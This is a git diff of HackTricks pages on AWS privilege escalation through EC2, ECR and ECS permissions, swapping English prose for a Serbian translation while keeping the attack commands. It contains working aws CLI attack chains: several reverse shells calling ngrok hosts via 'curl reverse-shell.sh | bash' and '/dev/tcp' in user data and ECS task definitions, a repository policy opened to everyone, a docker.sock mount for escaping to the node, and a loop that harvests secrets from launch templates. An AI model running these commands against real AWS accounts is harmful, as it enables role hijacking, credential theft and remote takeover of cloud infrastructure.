-With these permissions it's possible to change the instance profile associated to an instance so if the attack had already access to an instance he will be able to steal credentials for more instance profile roles changing the one associated with it.
-
-- If it **has an instance profile**, you can **remove** the instance profile (`ec2:DisassociateIamInstanceProfile`) and **associate** it \*
+Sa ovim dozvolama moguće je promeniti profil instanci povezan sa instancom, tako da ako je napadač već imao pristup instanci, moći će da ukrade akreditive za više uloga profila instanci menjajući onaj koji je povezan sa njom.
 
+- Ako **ima profil instanci**, možete **ukloniti** profil instanci (`ec2:DisassociateIamInstanceProfile`) i **povezati** ga \*
 ```bash
 aws ec2 describe-iam-instance-profile-associations --filters Name=instance-id,Values=i-0d36d47ba15d7b4da
 aws ec2 disassociate-iam-instance-profile --association-id 
 aws ec2 associate-iam-instance-profile --iam-instance-profile Name= --instance-id 
 ```
-
-- or **replace** the **instance profile** of the compromised instance (`ec2:ReplaceIamInstanceProfileAssociation`). \*
-
+- ili **zameni** **profil instance** kompromitovane instance (`ec2:ReplaceIamInstanceProfileAssociation`). \*
 ````
 ```bash
 aws ec2 replace-iam-instance-profile-association --iam-instance-profile Name= --association-id 
 ```
 ````
-
-**Potential Impact:** Direct privesc to a different EC2 role (you need to have compromised a AWS EC2 instance and some extra permission or specific instance profile status).
+**Potencijalni uticaj:** Direktno privesc na drugu EC2 ulogu (morate da ste kompromitovali AWS EC2 instancu i da imate dodatne dozvole ili specifičan status instance profila).
 
 ### `ec2:RequestSpotInstances`,`iam:PassRole`
 
-An attacker with the permissions **`ec2:RequestSpotInstances`and`iam:PassRole`** can **request** a **Spot Instance** with an **EC2 Role attached** and a **rev shell** in the **user data**.\
-Once the instance is run, he can **steal the IAM role**.
-
+Napadač sa dozvolama **`ec2:RequestSpotInstances` i `iam:PassRole`** može **zatražiti** **Spot Instancu** sa **priključenom EC2 ulogom** i **rev shell** u **korisničkim podacima**.\
+Kada se instanca pokrene, može **ukrasti IAM ulogu**.
 ```bash
 REV=$(printf '#!/bin/bash
 curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash
 ' | base64)
 
 aws ec2 request-spot-instances \
-   --instance-count 1 \
-   --launch-specification "{\"IamInstanceProfile\":{\"Name\":\"EC2-CloudWatch-Agent-Role\"}, \"InstanceType\": \"t2.micro\", \"UserData\":\"$REV\", \"ImageId\": \"ami-0c1bc246476a5572b\"}"
+--instance-count 1 \
+--launch-specification "{\"IamInstanceProfile\":{\"Name\":\"EC2-CloudWatch-Agent-Role\"}, \"InstanceType\": \"t2.micro\", \"UserData\":\"$REV\", \"ImageId\": \"ami-0c1bc246476a5572b\"}"
 ```
-
 ### `ec2:ModifyInstanceAttribute`
 
-An attacker with the **`ec2:ModifyInstanceAttribute`** can modify the instances attributes. Among them, he can **change the user data**, which implies that he can make the instance **run arbitrary data.** Which can be used to get a **rev shell to the EC2 instance**.
-
-Note that the attributes can only be **modified while the instance is stopped**, so the **permissions** **`ec2:StopInstances`** and **`ec2:StartInstances`**.
+Napadač sa **`ec2:ModifyInstanceAttribute`** može da menja atribute instanci. Među njima, može da **promeni korisničke podatke**, što podrazumeva da može da natera instancu da **izvrši proizvoljne podatke.** To se može iskoristiti za dobijanje **rev shell-a na EC2 instanci**.
 
+Napomena: Atributi se mogu **menjati samo dok je instanca zaustavljena**, tako da su potrebne **dozvole** **`ec2:StopInstances`** i **`ec2:StartInstances`**.
 ```bash
 TEXT='Content-Type: multipart/mixed; boundary="//"
 MIME-Version: 1.0
@@ -171,125 +154,110 @@ printf $TEXT | base64 > "$TEXT_PATH"
 aws ec2 stop-instances --instance-ids $INSTANCE_ID
 
 aws ec2 modify-instance-attribute \
-    --instance-id="$INSTANCE_ID" \
-    --attribute userData \
-    --value file://$TEXT_PATH
+--instance-id="$INSTANCE_ID" \
+--attribute userData \
+--value file://$TEXT_PATH
 
 aws ec2 start-instances --instance-ids $INSTANCE_ID
 ```
-
-**Potential Impact:** Direct privesc to any EC2 IAM Role attached to a created instance.
+**Potencijalni uticaj:** Direktno privesc na bilo koju EC2 IAM ulogu povezanu sa kreiranom instancom.
 
 ### `ec2:CreateLaunchTemplateVersion`,`ec2:CreateLaunchTemplate`,`ec2:ModifyLaunchTemplate`
 
-An attacker with the permissions **`ec2:CreateLaunchTemplateVersion`,`ec2:CreateLaunchTemplate`and `ec2:ModifyLaunchTemplate`** can create a **new Launch Template version** with a **rev shell in** the **user data** and **any EC2 IAM Role on it**, change the default version, and **any Autoscaler group** **using** that **Launch Templat**e that is **configured** to use the **latest** or the **default version** will **re-run the instances** using that template and will execute the rev shell.
-
+Napadač sa dozvolama **`ec2:CreateLaunchTemplateVersion`,`ec2:CreateLaunchTemplate` i `ec2:ModifyLaunchTemplate`** može da kreira **novu verziju Launch Template-a** sa **rev shell-om u** **korisničkim podacima** i **bilo kojom EC2 IAM ulogom na njemu**, promeniti podrazumevanu verziju, i **bilo koja Autoscaler grupa** **koja koristi** taj **Launch Template** koji je **konfiguran** da koristi **najnoviju** ili **podrazumevanu verziju** će **ponovo pokrenuti instance** koristeći taj template i izvršiće rev shell.
 ```bash
 REV=$(printf '#!/bin/bash
 curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash
 ' | base64)
 
 aws ec2 create-launch-template-version \
-   --launch-template-name bad_template \
-   --launch-template-data "{\"ImageId\": \"ami-0c1bc246476a5572b\", \"InstanceType\": \"t3.micro\", \"IamInstanceProfile\": {\"Name\": \"ecsInstanceRole\"}, \"UserData\": \"$REV\"}"
+--launch-template-name bad_template \
+--launch-template-data "{\"ImageId\": \"ami-0c1bc246476a5572b\", \"InstanceType\": \"t3.micro\", \"IamInstanceProfile\": {\"Name\": \"ecsInstanceRole\"}, \"UserData\": \"$REV\"}"
 
 aws ec2 modify-launch-template \
-   --launch-template-name bad_template \
-   --default-version 2
+--launch-template-name bad_template \
+--default-version 2
 ```
-
-**Potential Impact:** Direct privesc to a different EC2 role.
+**Potencijalni uticaj:** Direktno privesc na drugu EC2 ulogu.
 
 ### `autoscaling:CreateLaunchConfiguration`, `autoscaling:CreateAutoScalingGroup`, `iam:PassRole`
 
-An attacker with the permissions **`autoscaling:CreateLaunchConfiguration`,`autoscaling:CreateAutoScalingGroup`,`iam:PassRole`** can **create a Launch Configuration** with an **IAM Role** and a **rev shell** inside the **user data**, then **create an autoscaling group** from that config and wait for the rev shell to **steal the IAM Role**.
-
+Napadač sa dozvolama **`autoscaling:CreateLaunchConfiguration`,`autoscaling:CreateAutoScalingGroup`,`iam:PassRole`** može **napraviti Launch Configuration** sa **IAM Ulogom** i **rev shell** unutar **korisničkih podataka**, zatim **napraviti autoscaling grupu** iz te konfiguracije i čekati da rev shell **ukrade IAM Ulogu**.
 ```bash
 aws --profile "$NON_PRIV_PROFILE_USER" autoscaling create-launch-configuration \
-   --launch-configuration-name bad_config \
-   --image-id ami-0c1bc246476a5572b \
-   --instance-type t3.micro \
-   --iam-instance-profile EC2-CloudWatch-Agent-Role \
-   --user-data "$REV"
+--launch-configuration-name bad_config \
+--image-id ami-0c1bc246476a5572b \
+--instance-type t3.micro \
+--iam-instance-profile EC2-CloudWatch-Agent-Role \
+--user-data "$REV"
 
 aws --profile "$NON_PRIV_PROFILE_USER" autoscaling create-auto-scaling-group \
-   --auto-scaling-group-name bad_auto \
-   --min-size 1 --max-size 1 \
-   --launch-configuration-name bad_config \
-   --desired-capacity 1 \
-   --vpc-zone-identifier "subnet-e282f9b8"
+--auto-scaling-group-name bad_auto \
+--min-size 1 --max-size 1 \
+--launch-configuration-name bad_config \
+--desired-capacity 1 \
+--vpc-zone-identifier "subnet-e282f9b8"
 ```
-
-**Potential Impact:** Direct privesc to a different EC2 role.
+**Potencijalni uticaj:** Direktno privesc na drugu EC2 ulogu.
 
 ### `!autoscaling`
 
-The set of permissions **`ec2:CreateLaunchTemplate`** and **`autoscaling:CreateAutoScalingGroup`** **aren't enough to escalate** privileges to an IAM role because in order to attach the role specified in the Launch Configuration or in the Launch Template **you need to permissions `iam:PassRole`and `ec2:RunInstances`** (which is a known privesc).
+Skup dozvola **`ec2:CreateLaunchTemplate`** i **`autoscaling:CreateAutoScalingGroup`** **nije dovoljan za eskalaciju** privilegija na IAM ulogu jer je za povezivanje uloge navedene u Launch Configuration ili u Launch Template **potrebno dozvola `iam:PassRole` i `ec2:RunInstances`** (što je poznat privesc).
 
 ### `ec2-instance-connect:SendSSHPublicKey`
 
-An attacker with the permission **`ec2-instance-connect:SendSSHPublicKey`** can add an ssh key to a user and use it to access it (if he has ssh access to the instance) or to escalate privileges.
-
+Napadač sa dozvolom **`ec2-instance-connect:SendSSHPublicKey`** može dodati ssh ključ korisniku i koristiti ga za pristup (ako ima ssh pristup instanci) ili za eskalaciju privilegija.
 ```bash
 aws ec2-instance-connect send-ssh-public-key \
-   --instance-id "$INSTANCE_ID" \
-   --instance-os-user "ec2-user" \
-   --ssh-public-key "file://$PUBK_PATH"
+--instance-id "$INSTANCE_ID" \
+--instance-os-user "ec2-user" \
+--ssh-public-key "file://$PUBK_PATH"
 ```
-
-**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances.
+**Potencijalni uticaj:** Direktno privesc do EC2 IAM uloga povezanih sa aktivnim instancama.
 
 ### `ec2-instance-connect:SendSerialConsoleSSHPublicKey`
 
-An attacker with the permission **`ec2-instance-connect:SendSerialConsoleSSHPublicKey`** can **add an ssh key to a serial connection**. If the serial is not enable, the attacker needs the permission **`ec2:EnableSerialConsoleAccess` to enable it**.
-
-In order to connect to the serial port you also **need to know the username and password of a user** inside the machine.
+Napadač sa dozvolom **`ec2-instance-connect:SendSerialConsoleSSHPublicKey`** može **dodati ssh ključ na serijsku vezu**. Ako serijska veza nije omogućena, napadač treba dozvolu **`ec2:EnableSerialConsoleAccess` da je omogući**.
 
+Da biste se povezali na serijski port, takođe **morate znati korisničko ime i lozinku korisnika** unutar mašine.
 ```bash
 aws ec2 enable-serial-console-access
 
 aws ec2-instance-connect send-serial-console-ssh-public-key \
-   --instance-id "$INSTANCE_ID" \
-   --serial-port 0 \
-   --region "eu-west-1" \
-   --ssh-public-key "file://$PUBK_PATH"
+--instance-id "$INSTANCE_ID" \
+--serial-port 0 \
+--region "eu-west-1" \
+--ssh-public-key "file://$PUBK_PATH"
 
 ssh -i /tmp/priv $INSTANCE_ID.port0@serial-console.ec2-instance-connect.eu-west-1.aws
 ```
+Ovaj način nije previše koristan za privesc jer je potrebno znati korisničko ime i lozinku da bi se iskoristio.
 
-This way isn't that useful to privesc as you need to know a username and password to exploit it.
-
-**Potential Impact:** (Highly unprovable) Direct privesc to the EC2 IAM roles attached to running instances.
+**Potencijalni uticaj:** (Veoma neprovođen) Direktan privesc na EC2 IAM uloge povezane sa aktivnim instancama.
 
 ### `describe-launch-templates`,`describe-launch-template-versions`
 
-Since launch templates have versioning, an attacker with **`ec2:describe-launch-templates`** and **`ec2:describe-launch-template-versions`** permissions could exploit these to discover sensitive information, such as credentials present in user data. To accomplish this, the following script loops through all versions of the available launch templates:
-
+Pošto launch šabloni imaju verzionisanje, napadač sa **`ec2:describe-launch-templates`** i **`ec2:describe-launch-template-versions`** dozvolama mogao bi da iskoristi ovo da otkrije osetljive informacije, kao što su akreditivi prisutni u korisničkim podacima. Da bi to postigao, sledeći skript prolazi kroz sve verzije dostupnih launch šablona:
 ```bash
 for i in $(aws ec2 describe-launch-templates --region us-east-1 | jq -r '.LaunchTemplates[].LaunchTemplateId')
 do
-  echo "[*] Analyzing $i"
-  aws ec2 describe-launch-template-versions --launch-template-id $i --region us-east-1 | jq -r '.LaunchTemplateVersions[] | "\(.VersionNumber) \(.LaunchTemplateData.UserData)"' | while read version userdata
-  do
-    echo "VersionNumber: $version"
-    echo "$userdata" | base64 -d
-    echo
-  done | grep -iE "aws_|password|token|api"
+echo "[*] Analyzing $i"
+aws ec2 describe-launch-template-versions --launch-template-id $i --region us-east-1 | jq -r '.LaunchTemplateVersions[] | "\(.VersionNumber) \(.LaunchTemplateData.UserData)"' | while read version userdata
+do
+echo "VersionNumber: $version"
+echo "$userdata" | base64 -d
+echo
+done | grep -iE "aws_|password|token|api"
 done
 ```
+U gornjim komandama, iako specificiramo određene obrasce (`aws_|password|token|api`), možete koristiti drugačiji regex za pretragu drugih tipova osetljivih informacija.
 
-In the above commands, although we're specifying certain patterns (`aws_|password|token|api`), you can use a different regex to search for other types of sensitive information.
+Pretpostavljajući da pronađemo `aws_access_key_id` i `aws_secret_access_key`, možemo koristiti te akreditive za autentifikaciju na AWS.
 
-Assuming we find `aws_access_key_id` and `aws_secret_access_key`, we can use these credentials to authenticate to AWS.
+**Potencijalni uticaj:** Direktno eskaliranje privilegija na IAM korisnika(e).
 
-**Potential Impact:** Direct privilege escalation to IAM user(s).
-
-## References
+## Reference
 
 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md
index fd4686edb..94c08cc90 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md
@@ -6,21 +6,21 @@
 
 ### `ecr:GetAuthorizationToken`,`ecr:BatchGetImage`
 
-An attacker with the **`ecr:GetAuthorizationToken`** and **`ecr:BatchGetImage`** can login to ECR and download images.
+Napadač sa **`ecr:GetAuthorizationToken`** i **`ecr:BatchGetImage`** može da se prijavi na ECR i preuzme slike.
 
-For more info on how to download images:
+Za više informacija o tome kako preuzeti slike:
 
 {{#ref}}
 ../aws-post-exploitation/aws-ecr-post-exploitation.md
 {{#endref}}
 
-**Potential Impact:** Indirect privesc by intercepting sensitive information in the traffic.
+**Potencijalni uticaj:** Indirektno eskaliranje privilegija presretanjem osetljivih informacija u saobraćaju.
 
 ### `ecr:GetAuthorizationToken`, `ecr:BatchCheckLayerAvailability`, `ecr:CompleteLayerUpload`, `ecr:InitiateLayerUpload`, `ecr:PutImage`, `ecr:UploadLayerPart`
 
-An attacker with the all those permissions **can login to ECR and upload images**. This can be useful to escalate privileges to other environments where those images are being used.
+Napadač sa svim tim dozvolama **može da se prijavi na ECR i otpremi slike**. Ovo može biti korisno za eskalaciju privilegija na druge okruženja gde se te slike koriste.
 
-To learn how to upload a new image/update one, check:
+Da biste saznali kako da otpremite novu sliku/izmenite jednu, proverite:
 
 {{#ref}}
 ../aws-services/aws-eks-enum.md
@@ -28,85 +28,73 @@ To learn how to upload a new image/update one, check:
 
 ### `ecr-public:GetAuthorizationToken`, `ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload`, `ecr-public:InitiateLayerUpload, ecr-public:PutImage`, `ecr-public:UploadLayerPart`
 
-Like the previous section, but for public repositories.
+Kao u prethodnom odeljku, ali za javne repozitorijume.
 
 ### `ecr:SetRepositoryPolicy`
 
-An attacker with this permission could **change** the **repository** **policy** to grant himself (or even everyone) **read/write access**.\
-For example, in this example read access is given to everyone.
-
+Napadač sa ovom dozvolom može **promeniti** **politiku** **repozitorijuma** kako bi sebi (ili čak svima) dodelio **pristup za čitanje/pisanje**.\
+Na primer, u ovom primeru pristup za čitanje je dat svima.
 ```bash
 aws ecr set-repository-policy \
-    --repository-name  \
-    --policy-text file://my-policy.json
+--repository-name  \
+--policy-text file://my-policy.json
 ```
-
-Contents of `my-policy.json`:
-
+Sadržaj `my-policy.json`:
 ```json
 {
-  "Version": "2008-10-17",
-  "Statement": [
-    {
-      "Sid": "allow public pull",
-      "Effect": "Allow",
-      "Principal": "*",
-      "Action": [
-        "ecr:BatchCheckLayerAvailability",
-        "ecr:BatchGetImage",
-        "ecr:GetDownloadUrlForLayer"
-      ]
-    }
-  ]
+"Version": "2008-10-17",
+"Statement": [
+{
+"Sid": "allow public pull",
+"Effect": "Allow",
+"Principal": "*",
+"Action": [
+"ecr:BatchCheckLayerAvailability",
+"ecr:BatchGetImage",
+"ecr:GetDownloadUrlForLayer"
+]
+}
+]
 }
 ```
-
 ### `ecr-public:SetRepositoryPolicy`
 
-Like the previoous section, but for public repositories.\
-An attacker can **modify the repository policy** of an ECR Public repository to grant unauthorized public access or to escalate their privileges.
-
+Kao u prethodnom odeljku, ali za javne repozitorijume.\
+Napadač može **izmeniti politiku repozitorijuma** javnog ECR repozitorijuma kako bi omogućio neovlašćen javni pristup ili da eskalira svoje privilegije.
 ```bash
 bashCopy code# Create a JSON file with the malicious public repository policy
 echo '{
-  "Version": "2008-10-17",
-  "Statement": [
-    {
-      "Sid": "MaliciousPublicRepoPolicy",
-      "Effect": "Allow",
-      "Principal": "*",
-      "Action": [
-        "ecr-public:GetDownloadUrlForLayer",
-        "ecr-public:BatchGetImage",
-        "ecr-public:BatchCheckLayerAvailability",
-        "ecr-public:PutImage",
-        "ecr-public:InitiateLayerUpload",
-        "ecr-public:UploadLayerPart",
-        "ecr-public:CompleteLayerUpload",
-        "ecr-public:DeleteRepositoryPolicy"
-      ]
-    }
-  ]
+"Version": "2008-10-17",
+"Statement": [
+{
+"Sid": "MaliciousPublicRepoPolicy",
+"Effect": "Allow",
+"Principal": "*",
+"Action": [
+"ecr-public:GetDownloadUrlForLayer",
+"ecr-public:BatchGetImage",
+"ecr-public:BatchCheckLayerAvailability",
+"ecr-public:PutImage",
+"ecr-public:InitiateLayerUpload",
+"ecr-public:UploadLayerPart",
+"ecr-public:CompleteLayerUpload",
+"ecr-public:DeleteRepositoryPolicy"
+]
+}
+]
 }' > malicious_public_repo_policy.json
 
 # Apply the malicious public repository policy to the ECR Public repository
 aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json
 ```
-
-**Potential Impact**: Unauthorized public access to the ECR Public repository, allowing any user to push, pull, or delete images.
+**Potencijalni uticaj**: Neovlašćen javni pristup ECR javnom repozitorijumu, što omogućava bilo kojem korisniku da postavlja, preuzima ili briše slike.
 
 ### `ecr:PutRegistryPolicy`
 
-An attacker with this permission could **change** the **registry policy** to grant himself, his account (or even everyone) **read/write access**.
-
+Napadač sa ovom dozvolom mogao bi **promeniti** **politiku repozitorijuma** kako bi sebi, svom nalogu (ili čak svima) dodelio **pristup za čitanje/pisanje**.
 ```bash
 aws ecr set-repository-policy \
-    --repository-name  \
-    --policy-text file://my-policy.json
+--repository-name  \
+--policy-text file://my-policy.json
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md
index 4988270ab..fc73ff6a9 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md
@@ -4,7 +4,7 @@
 
 ## ECS
 
-More **info about ECS** in:
+Više **informacija o ECS** u:
 
 {{#ref}}
 ../aws-services/aws-ecs-enum.md
@@ -12,185 +12,173 @@ More **info about ECS** in:
 
 ### `iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:RunTask`
 
-An attacker abusing the `iam:PassRole`, `ecs:RegisterTaskDefinition` and `ecs:RunTask` permission in ECS can **generate a new task definition** with a **malicious container** that steals the metadata credentials and **run it**.
-
+Napadač koji zloupotrebljava dozvolu `iam:PassRole`, `ecs:RegisterTaskDefinition` i `ecs:RunTask` u ECS može **generisati novu definiciju zadatka** sa **malicioznim kontejnerom** koji krade metapodatke akreditiva i **pokrenuti ga**.
 ```bash
 # Generate task definition with rev shell
 aws ecs register-task-definition --family iam_exfiltration \
-    --task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
-    --network-mode "awsvpc" \
-    --cpu 256 --memory 512\
-    --requires-compatibilities "[\"FARGATE\"]" \
-    --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"
+--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
+--network-mode "awsvpc" \
+--cpu 256 --memory 512\
+--requires-compatibilities "[\"FARGATE\"]" \
+--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"
 
 # Run task definition
 aws ecs run-task --task-definition iam_exfiltration \
-    --cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \
-    --launch-type FARGATE \
-    --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}"
+--cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \
+--launch-type FARGATE \
+--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}"
 
 # Delete task definition
 ## You need to remove all the versions (:1 is enough if you just created one)
 aws ecs deregister-task-definition --task-definition iam_exfiltration:1
 ```
-
-**Potential Impact:** Direct privesc to a different ECS role.
+**Potencijalni uticaj:** Direktno privesc na drugu ECS ulogu.
 
 ### `iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:StartTask`
 
-Just like in the previous example an attacker abusing the **`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:StartTask`** permissions in ECS can **generate a new task definition** with a **malicious container** that steals the metadata credentials and **run it**.\
-However, in this case, a container instance to run the malicious task definition need to be.
-
+Baš kao u prethodnom primeru, napadač koji zloupotrebljava **`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:StartTask`** dozvole u ECS može **generisati novu definiciju zadatka** sa **malicioznim kontejnerom** koji krade kredencijale metapodataka i **pokrenuti ga**.\
+Međutim, u ovom slučaju, potrebna je instanca kontejnera za pokretanje maliciozne definicije zadatka.
 ```bash
 # Generate task definition with rev shell
 aws ecs register-task-definition --family iam_exfiltration \
-    --task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
-    --network-mode "awsvpc" \
-    --cpu 256 --memory 512\
-    --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"
+--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
+--network-mode "awsvpc" \
+--cpu 256 --memory 512\
+--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"
 
 aws ecs start-task --task-definition iam_exfiltration \
-    --container-instances 
+--container-instances 
 
 # Delete task definition
 ## You need to remove all the versions (:1 is enough if you just created one)
 aws ecs deregister-task-definition --task-definition iam_exfiltration:1
 ```
-
-**Potential Impact:** Direct privesc to any ECS role.
+**Potencijalni uticaj:** Direktno privesc na bilo koju ECS ulogu.
 
 ### `iam:PassRole`, `ecs:RegisterTaskDefinition`, (`ecs:UpdateService|ecs:CreateService)`
 
-Just like in the previous example an attacker abusing the **`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:UpdateService`** or **`ecs:CreateService`** permissions in ECS can **generate a new task definition** with a **malicious container** that steals the metadata credentials and **run it by creating a new service with at least 1 task running.**
-
+Baš kao u prethodnom primeru, napadač koji zloupotrebljava **`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:UpdateService`** ili **`ecs:CreateService`** dozvole u ECS može **generisati novu definiciju zadatka** sa **malicioznim kontejnerom** koji krade metapodatke akreditiva i **pokrenuti je kreiranjem nove usluge sa najmanje 1 zadatkom koji se izvršava.**
 ```bash
 # Generate task definition with rev shell
 aws ecs register-task-definition --family iam_exfiltration \
-    --task-role-arn  "$ECS_ROLE_ARN" \
-    --network-mode "awsvpc" \
-    --cpu 256 --memory 512\
-    --requires-compatibilities "[\"FARGATE\"]" \
-    --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]"
+--task-role-arn  "$ECS_ROLE_ARN" \
+--network-mode "awsvpc" \
+--cpu 256 --memory 512\
+--requires-compatibilities "[\"FARGATE\"]" \
+--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]"
 
 # Run the task creating a service
 aws ecs create-service --service-name exfiltration \
-    --task-definition iam_exfiltration \
-    --desired-count 1 \
-    --cluster "$CLUSTER_ARN" \
-    --launch-type FARGATE \
-    --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"$SUBNET\"]}}"
+--task-definition iam_exfiltration \
+--desired-count 1 \
+--cluster "$CLUSTER_ARN" \
+--launch-type FARGATE \
+--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"$SUBNET\"]}}"
 
 # Run the task updating a service
 aws ecs update-service --cluster  \
-    --service  \
-    --task-definition 
+--service  \
+--task-definition 
 ```
-
-**Potential Impact:** Direct privesc to any ECS role.
+**Potencijalni Uticaj:** Direktno privesc na bilo koju ECS ulogu.
 
 ### `iam:PassRole`, (`ecs:UpdateService|ecs:CreateService)`
 
-Actually, just with those permissions it's possible to use overrides to executer arbitrary commands in a container with an arbitrary role with something like:
-
+U stvari, samo sa tim dozvolama moguće je koristiti override da izvršite proizvoljne komande u kontejneru sa proizvoljnom ulogom sa nečim poput:
 ```bash
 aws ecs run-task \
-    --task-definition "" \
-    --overrides '{"taskRoleArn":"", "containerOverrides":[{"name":"","command":["/bin/bash","-c","curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh"]}]}' \
-    --cluster  \
-    --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"\"]}}"
+--task-definition "" \
+--overrides '{"taskRoleArn":"", "containerOverrides":[{"name":"","command":["/bin/bash","-c","curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh"]}]}' \
+--cluster  \
+--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"\"]}}"
 ```
-
-**Potential Impact:** Direct privesc to any ECS role.
+**Potencijalni uticaj:** Direktno privesc na bilo koju ECS ulogu.
 
 ### `ecs:RegisterTaskDefinition`, **`(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)`**
 
-This scenario is like the previous ones but **without** the **`iam:PassRole`** permission.\
-This is still interesting because if you can run an arbitrary container, even if it's without a role, you could **run a privileged container to escape** to the node and **steal the EC2 IAM role** and the **other ECS containers roles** running in the node.\
-You could even **force other tasks to run inside the EC2 instance** you compromise to steal their credentials (as discussed in the [**Privesc to node section**](aws-ecs-privesc.md#privesc-to-node)).
+Ovaj scenario je sličan prethodnim, ali **bez** dozvole **`iam:PassRole`**.\
+Ovo je i dalje zanimljivo jer ako možete pokrenuti proizvoljni kontejner, čak i bez uloge, mogli biste **pokrenuti privilegovani kontejner da pobegnete** na čvor i **ukradete EC2 IAM ulogu** i **druge ECS uloge kontejnera** koje se izvršavaju na čvoru.\
+Možete čak i **prisiliti druge zadatke da se izvršavaju unutar EC2 instance** koju kompromitujete da biste ukrali njihove akreditive (kao što je objašnjeno u [**odeljku Privesc na čvor**](aws-ecs-privesc.md#privesc-to-node)).
 
 > [!WARNING]
-> This attack is only possible if the **ECS cluster is using EC2** instances and not Fargate.
-
+> Ovaj napad je moguć samo ako **ECS klaster koristi EC2** instance, a ne Fargate.
 ```bash
 printf '[
-    {
-        "name":"exfil_creds",
-        "image":"python:latest",
-        "entryPoint":["sh", "-c"],
-        "command":["/bin/bash -c \\\"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""],
-        "mountPoints": [
-            {
-                "readOnly": false,
-                "containerPath": "/var/run/docker.sock",
-                "sourceVolume": "docker-socket"
-            }
-        ]
-    }
+{
+"name":"exfil_creds",
+"image":"python:latest",
+"entryPoint":["sh", "-c"],
+"command":["/bin/bash -c \\\"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""],
+"mountPoints": [
+{
+"readOnly": false,
+"containerPath": "/var/run/docker.sock",
+"sourceVolume": "docker-socket"
+}
+]
+}
 ]' > /tmp/task.json
 
 printf '[
-    {
-        "name": "docker-socket",
-        "host": {
-            "sourcePath": "/var/run/docker.sock"
-        }
-    }
+{
+"name": "docker-socket",
+"host": {
+"sourcePath": "/var/run/docker.sock"
+}
+}
 ]' > /tmp/volumes.json
 
 
 aws ecs register-task-definition --family iam_exfiltration \
-    --cpu 256 --memory 512 \
-    --requires-compatibilities '["EC2"]' \
-    --container-definitions file:///tmp/task.json \
-    --volumes file:///tmp/volumes.json
+--cpu 256 --memory 512 \
+--requires-compatibilities '["EC2"]' \
+--container-definitions file:///tmp/task.json \
+--volumes file:///tmp/volumes.json
 
 
 aws ecs run-task --task-definition iam_exfiltration \
